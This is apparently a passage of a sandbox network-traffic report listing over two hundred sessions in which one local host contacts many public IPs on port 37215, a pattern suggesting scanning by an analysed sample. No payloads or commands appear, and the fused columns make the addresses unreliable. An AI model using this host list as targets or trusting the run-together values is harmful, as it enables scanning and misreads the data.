                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9503192.168.2.1333842197.201.137.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9504192.168.2.1351502157.156.232.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9505192.168.2.1333622157.109.217.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9506192.168.2.1350852157.41.187.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9507192.168.2.1351746114.6.132.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9508192.168.2.134092841.62.63.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9509192.168.2.1344700157.141.12.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9510192.168.2.1338526197.34.112.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9511192.168.2.133838091.164.107.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9512192.168.2.1335988157.189.171.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9513192.168.2.1356318161.154.60.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9514192.168.2.1356994157.128.106.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9515192.168.2.1334072197.213.187.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9516192.168.2.1351628197.189.35.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9517192.168.2.135657641.243.141.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9518192.168.2.1344110197.244.128.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9519192.168.2.1352454157.92.214.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9520192.168.2.134626041.167.21.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9521192.168.2.1336962197.36.194.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9522192.168.2.1359500157.143.117.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9523192.168.2.1335136157.190.90.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9524192.168.2.1354264157.99.85.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9525192.168.2.1343170160.51.160.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9526192.168.2.1341492157.227.212.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9527192.168.2.1358868197.122.77.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9528192.168.2.1344760157.44.65.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9529192.168.2.1352570157.213.33.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9530192.168.2.1334678197.159.191.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9531192.168.2.1346342197.221.76.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9532192.168.2.1338224157.196.180.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9533192.168.2.135317441.27.254.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9534192.168.2.1357666157.137.18.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9535192.168.2.1348586157.76.211.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9536192.168.2.1348564102.119.93.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9537192.168.2.1346898197.104.248.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9538192.168.2.1341184157.147.82.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9539192.168.2.1340364197.168.125.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9540192.168.2.134448241.10.221.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9541192.168.2.1354768197.246.133.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9542192.168.2.1343422132.172.186.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9543192.168.2.1352354205.45.178.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9544192.168.2.13407565.63.83.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9545192.168.2.134946852.179.75.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9546192.168.2.1356732197.184.124.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9547192.168.2.1359042157.41.98.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9548192.168.2.1358432197.100.213.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9549192.168.2.1339690115.166.70.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9550192.168.2.1357192197.169.160.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9551192.168.2.135856637.155.229.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9552192.168.2.133433641.157.176.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9553192.168.2.135566441.77.76.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9554192.168.2.1342914157.214.153.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9555192.168.2.1359240101.12.71.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9556192.168.2.1335140197.76.239.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9557192.168.2.1349722197.216.120.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9558192.168.2.135312441.228.158.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9559192.168.2.135704239.43.197.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9560192.168.2.1352188105.144.213.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9561192.168.2.1334232197.117.227.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9562192.168.2.133416041.229.98.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9563192.168.2.135599635.214.100.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9564192.168.2.1338320157.156.63.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9565192.168.2.1346358157.251.2.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9566192.168.2.1338032197.207.34.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9567192.168.2.133498291.95.127.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9568192.168.2.1339940157.53.65.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9569192.168.2.133369490.216.222.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9570192.168.2.1348530197.43.254.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9571192.168.2.1343230157.51.156.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9572192.168.2.1350202197.253.58.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9573192.168.2.1347688197.50.95.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9574192.168.2.135484041.144.7.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9575192.168.2.1360140175.23.142.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9576192.168.2.1358862119.165.97.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9577192.168.2.133343041.44.61.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9578192.168.2.135601641.18.130.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9579192.168.2.1346110132.139.85.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9580192.168.2.1356150157.232.118.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9581192.168.2.134989449.109.0.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9582192.168.2.1359904155.195.216.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9583192.168.2.134657241.163.186.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9584192.168.2.135824099.115.131.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9585192.168.2.134304041.183.241.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9586192.168.2.1360324110.121.51.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9587192.168.2.135262841.248.164.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9588192.168.2.134872853.81.218.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9589192.168.2.1358050197.230.218.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9590192.168.2.1347248157.95.159.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9591192.168.2.134584641.232.17.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9592192.168.2.133448041.226.91.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9593192.168.2.133370243.141.167.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9594192.168.2.1359040197.179.67.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9595192.168.2.133621641.69.61.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9596192.168.2.1337100197.191.244.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9597192.168.2.135519641.217.221.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9598192.168.2.1337310157.100.239.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9599192.168.2.134974641.82.28.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9600192.168.2.1350446197.12.74.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9601192.168.2.1359936157.96.202.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9602192.168.2.134556441.6.106.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9603192.168.2.1342470197.155.213.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9604192.168.2.1332976157.38.220.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9605192.168.2.1341444157.79.146.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9606192.168.2.1337050197.146.103.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9607192.168.2.135361241.213.164.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9608192.168.2.1339244157.72.69.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9609192.168.2.1351368157.55.196.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9610192.168.2.134134212.54.247.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9611192.168.2.1350806113.220.184.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9612192.168.2.133399641.193.113.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9613192.168.2.1337184157.147.154.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9614192.168.2.1358962157.188.213.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9615192.168.2.135221841.129.179.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9616192.168.2.1353816221.150.236.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9617192.168.2.134526441.176.195.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9618192.168.2.1358184197.22.61.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9619192.168.2.1340480157.44.86.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9620192.168.2.134116841.84.111.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9621192.168.2.1346232113.31.28.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9622192.168.2.134820841.186.251.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9623192.168.2.134201842.72.112.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9624192.168.2.1350898157.150.182.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9625192.168.2.134336041.60.110.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9626192.168.2.1343502157.151.235.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9627192.168.2.133688241.42.238.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9628192.168.2.134006441.102.82.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9629192.168.2.1340556157.193.187.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9630192.168.2.133956841.37.209.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9631192.168.2.133841641.16.26.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9632192.168.2.1360756157.159.166.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9633192.168.2.134824641.156.95.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9634192.168.2.1343704197.84.100.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9635192.168.2.134453841.12.65.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9636192.168.2.135698841.249.213.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9637192.168.2.1346076157.58.251.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9638192.168.2.1353090157.31.247.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9639192.168.2.134468641.241.116.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9640192.168.2.1337758157.20.70.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9641192.168.2.134269641.198.182.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9642192.168.2.1338762157.201.157.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9643192.168.2.1355984197.66.132.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9644192.168.2.134212438.162.223.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9645192.168.2.133350866.177.234.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9646192.168.2.133866841.186.255.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9647192.168.2.135802841.26.60.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9648192.168.2.1342414136.135.12.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9649192.168.2.133678041.138.47.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9650192.168.2.134706641.195.244.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9651192.168.2.1343958197.121.49.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9652192.168.2.1340320185.56.79.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9653192.168.2.1349890157.224.118.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9654192.168.2.1356948157.170.238.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9655192.168.2.1335272197.6.94.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9656192.168.2.1351164157.233.178.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9657192.168.2.134772641.71.202.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9658192.168.2.1333830157.53.212.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9659192.168.2.135852841.61.65.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9660192.168.2.1332834157.252.215.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9661192.168.2.1357990157.155.124.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9662192.168.2.133650441.198.214.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9663192.168.2.1341640197.186.45.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9664192.168.2.1345418157.117.152.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9665192.168.2.134005041.45.159.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9666192.168.2.1347760197.17.21.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9667192.168.2.134045041.155.48.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9668192.168.2.134818841.196.136.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9669192.168.2.1339768157.100.124.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9670192.168.2.135199840.78.172.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9671192.168.2.1357120157.35.187.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9672192.168.2.1351700104.0.42.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9673192.168.2.1355214197.142.183.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9674192.168.2.134941087.154.27.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9675192.168.2.133290441.121.172.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9676192.168.2.134222646.147.0.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9677192.168.2.1356422157.57.243.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9678192.168.2.1342876157.246.103.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9679192.168.2.1351086156.232.147.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9680192.168.2.135280064.48.38.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9681192.168.2.134708841.113.1.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9682192.168.2.1350064197.197.210.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9683192.168.2.1357714197.209.148.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9684192.168.2.133770024.16.11.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9685192.168.2.1341576193.137.22.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9686192.168.2.1344746197.47.53.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9687192.168.2.1357090157.45.223.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9688192.168.2.1343894189.246.130.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9689192.168.2.133746841.79.88.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9690192.168.2.134540841.29.242.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9691192.168.2.1349410197.174.14.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9692192.168.2.1350708197.169.138.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9693192.168.2.1354518157.121.37.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9694192.168.2.133463241.182.132.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9695192.168.2.1348646157.8.92.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9696192.168.2.1334980203.49.249.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9697192.168.2.134693413.124.229.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9698192.168.2.135881441.68.125.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9699192.168.2.1354330106.48.76.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9700192.168.2.1342446197.0.38.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9701192.168.2.1353388157.199.23.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9702192.168.2.135131458.147.60.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9703192.168.2.1334884157.89.193.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9704192.168.2.134714441.48.43.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9705192.168.2.1344954129.123.207.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9706192.168.2.1335482197.68.55.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9707192.168.2.133376236.150.78.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9708192.168.2.1336728157.225.33.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9709192.168.2.135978241.183.250.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9710192.168.2.1343562200.177.185.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9711192.168.2.1343444157.168.113.16637215
                                                  TimestampBytes transferredDirectionData


